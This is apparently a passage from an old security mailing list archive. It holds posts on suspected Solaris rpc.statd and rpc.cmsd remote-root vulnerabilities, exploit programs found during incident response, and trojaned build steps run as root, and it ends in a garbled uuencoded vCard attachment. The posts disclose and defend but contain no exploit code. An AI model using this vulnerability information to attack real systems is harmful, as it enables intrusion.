machine > > was probably compromised > > by one of these programs, the threat seems real!! > > And did this server have the statd patch installed (106592-02 on sparc and > 106593-02 on x86)? Did it have the various security patches for the other > services mention installed as well? > > Perhaps the program was part of the exploit which allowed indirect RPC > calls with statd that was discussed here (and elsewhere) several weeks > back. > > I don't think your conclusion is supported given the information you > provided. Perhaps you could provide more information about the exploit > before rushing to claim that there is a new vulnerability. > > Tabor > > -- > __ __ > Tabor J. Wells [EMAIL PROTECTED] > Technology Manager http://www.smarterliving.com > Smarter Living, Inc.It's your time. It's your money. >
Vulnerability in Solaris 2.6. rpc.statd ?
While performing an on-site incident response at ___, I found several Solaris-oriented exploit programs including a statd2.6 (others were calendar manager, tooltalk, and lockd?). Since there is an exploit program for statd on Solaris 2.6, I could conclude that Solaris 2.6 statd is vulnerable to attack. I have not tried the exploit, but since the machine was probably compromised by one of these programs, the threat seems real!! __ Bob and Ann Todd Advanced Research Corporation Office: (703) 938-4385 Mobile: (703) 203-0855 www.arc.com
Re: Troff dangerous.
> (1) Root installs the malicious roff source unknowingly. > > (2) During the process of building/installing the program, X > at which point the trojan > horse does it dirty work. s/X/configure runs some stuff/ s/X/Make runs some stuff/ s/X/shell runs som stuff/ s/X/some random evil program runs/ Yeah, a troff macro is a little obtuse for the younger generation, but so what? How many people who run those nifty gnu autoconf twiddlies do you think are checking beforehand what they are doing as root? At the risk of further flogging the sticky spot on the road that used to be a horse, this really shouldn't be a shocker to anyone on this list. Most anything you run as root can be made to own you by whoever can change it before you run it. -Bob
Exploit of rpc.cmsd
The calendar manager (rpc.cmsd) on Solaris 2.5 and 2.5.1 is vulnerable to a buffer overflow attack. Further, it appears that even patched versions may be vulnerable. Also, rpc.cmsd under Solaris 2.6 could also be problematic. Where possible, it should be disabled in inetd.conf The exploit allows for remote root access where we have seen the intruder delete administrator logs, change homepages, and insert backdoors. The attack signature is similar to the tooltalk attack. begin 666 Bob Todd.vcf M0D5'24XZ5D-!4D0-"E9%4E-)3TXZ,BXQ#0I..E1O9&0[0F]B#0I&3CI";V(@ M5&]D9 T*3U)'.D%D=F%N8V5D(%)ED%* M0F=.5D)!651!;%9435)%=T1W641645%)17=H5PT*(" @(&%82FYA5S5P651% M4$U!,$=!,55%0GA-1U9M;&QB;35H35-9=TI!641645%+17@Q0EI(6FAB;4YL M6D-"4UI83FQ96$IJ84-"1 T*(" @(&(S2G=B,TIH9$=L=F)J16Q-0TU'03%5 M14-X36-4;58P8S).:&-'56=1,CET8T=&,&%72G!B1VPP95-"2&-M.3%C1$5P M34-C1PT*(" @($$Q545!>$UG45=2,EE7-6I:5U%G56U6>EI71GE9,F=G43(Y M>6-'.7E96%)P8C(T9U$P17A(1$%A0F=K<6AK:45EY-6IB,C!W2&AC3D]49W=.5$$U341)>4]44317:&-.3U1K M>$UJ37=-1$EY3U11-%=J0T)O5$5,34%K1PT*(" @($$Q545":$U#5E9->$54 M05!"9TY60D%G5$-&6DI5:V1*5&ML0DU2.'=(45E$5E%12T5X6D):2%IH8FU. M;%I#0E-:6$YL65A*:@T*(" @(&%#0D1B,TIW35-9=TI!641645%,17@Q3F%7 M3GEB,TYV6FY19U$R.71C1T8P85=*<&)';#!E4T)(8VTY,6-$15E-0EE'03%5 M10T*(" @($%X35!1;3EI2492=EI'46=96%%G459*1$U2=W='9UE*2V]:26AV M8TY!46M"1FEI&>FU3,$M*:U!L,C)F, T*(" @(&IW9S=,,FY84&%&<'I"5VMF M=4)M>7=#4D5(5&Y)+S!G=RM-6BM':T-!=T5!051!3D)G:W%H:VE'.7